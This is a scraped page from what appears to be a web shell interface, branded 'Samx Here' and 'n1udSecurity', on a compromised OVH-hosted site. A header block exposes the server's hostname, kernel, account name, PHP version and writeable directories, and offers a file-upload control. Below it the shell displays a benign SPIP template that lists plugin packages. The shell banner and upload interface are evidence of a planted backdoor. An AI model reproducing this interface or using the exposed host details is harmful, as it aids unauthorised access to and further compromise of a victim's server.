Samx Here
n1udSecurity


Server : Apache
System : Linux webd348.cluster026.gra.hosting.ovh.net 5.15.148-ovh-vps-grsec-zfs-classid #1 SMP Thu Feb 8 09:41:04 UTC 2024 x86_64
User : hednacluml ( 122243)
PHP Version : 8.3.9
Disable Function : _dyuweyrj4,_dyuweyrj4r,dl
Directory :  /home/hednacluml/jobs/plugins-dist/svp/prive/objets/liste/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /home/hednacluml/jobs/plugins-dist/svp/prive/objets/liste/paquets.html
[(#REM) <!-- Liste des paquets :
	- soit integrale de l'ensemble du site
	- soit reduite a un seul depot ou a un plugin

	Les parametres d'environnement specifiques sont :
	- titre     : le titre de la liste
	- par       : le champ tri principal
	- pas       : le pas de pagination
	- id_depot  : filtrer la liste sur un depot
	- id_plugin : filtrer la liste sur un plugin
	- recherche : critere de recherche
	- where     : condition supplementaire construire par l'appelant (non utilisee)
 -->]

[(#SET{defaut_tri, #ARRAY{
	nom_archive, 1,
	date_modif, -1,
	version, -1,
	id_paquet, 1}})]

<B_liste_paquets>
#ANCRE_PAGINATION
<div class="liste-objets paquets">
	<table class="spip liste" summary="<:svp:resume_table_paquets:>">
	[<caption><strong class="caption">(#ENV*{titre, #GRAND_TOTAL|singulier_ou_pluriel{svp:info_1_paquet,svp:info_nb_paquets}})</strong></caption>]
		<thead>
			<tr class="first_row">
				<th class="titre principale">[(#TRI{nom_archive, <:info_titre|label_nettoyer:>, ajax})]</th>
				<th class="date secondaire">[(#TRI{date_modif, <:svp:label_modifie_le:>, ajax})]</th>
				<th class="intervalle"><:svp:label_compatibilite_spip:></th>
				<th class="numero">[(#TRI{version, <:svp:label_version:>, ajax})]</th>
				<th class="lien"><:svp:titre_depot:></th>
				<th class="lien">&nbsp;</th>
			</tr>
		</thead>
		<tbody>
<BOUCLE_liste_paquets(PAQUETS) {where?}{id_depot?}{id_plugin?}{recherche?}{tri #ENV{par, nom_archive}, #GET{defaut_tri}}{pagination #ENV{pas, 25}}>
			<tr class="[(#COMPTEUR_BOUCLE|alterner{row_odd,row_even})]">
			<BOUCLE_depot_paquet(DEPOTS) {id_depot}>
				<td class="titre principale">
					<a[ id="(#NOM_ARCHIVE|basename{.zip})"][ href="(#URL_ARCHIVES|concat{/}|concat{#NOM_ARCHIVE})"] title="<:svp:bulle_telecharger_archive:>[ (#NOM_ARCHIVE)][ - (#NBO_ARCHIVE|taille_en_octets)]">
						[(#NOM_ARCHIVE)]
					</a>
				</td>
				<td class="date secondaire">[(#DATE_MODIF|affdate{d-m-y H:i})]</td>
				<td class="intervalle">[(#COMPATIBILITE_SPIP|svp_afficher_intervalle{SPIP}|sinon{--})]</td>
				<td class="numero">[(#_liste_paquets:VERSION)]</td>
				<td class="lien">
					<a[ href="(#ID_DEPOT|generer_objet_url{depot})"] title="<:svp:bulle_aller_depot:>">
						[(#TITRE)]
					</a>
				</td>
				<td class="lien">
					[<a href="(#LIEN_DOC)" title="<:svp:lien_documentation:>">
						[(#CHEMIN_IMAGE{documentation-24.png}|balise_img{'', icone})]
					</a>]
				</td>
			</BOUCLE_depot_paquet>
			</tr>
</BOUCLE_liste_paquets>
		</tbody>
	</table>
	[<nav class='pagination'>(#PAGINATION{prive})</nav>]
</div>
</B_liste_paquets>
<//B_liste_paquets>

SAMX